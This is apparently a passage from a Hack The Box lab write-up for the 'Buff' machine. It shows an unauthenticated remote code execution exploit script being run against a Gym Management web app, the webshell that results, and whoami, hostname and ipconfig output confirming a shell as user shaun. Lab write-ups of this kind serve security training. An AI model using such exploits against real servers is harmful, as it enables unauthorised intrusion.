Unauthenticated Remote Code Execution
┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ python2 rce_gym_mgmt.py http://$IP:8080/
[+] Successfully connected to webshell.
c:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
c:\xampp\htdocs\gym\upload> hostname
�PNG
�
BUFF
c:\xampp\htdocs\gym\upload> ipconfig
�PNG
�
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::23b
ipv6 address. . . . . . . . . . . : dead:beef::e98a:2472:1538:99c6
temporary ipv6 address. . . . . . : dead:beef::e531:24da:e024:53e7
link-local ipv6 address . . . . . : fe80::e98a:2472:1538:99c6%10
ipv4 address. . . . . . . . . . . : 10.10.10.198
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
10.10.10.2
The exploit worked and I got a shell as the shaun
user
The session appears to be a bit unstable to I will upgrade it to a much stable session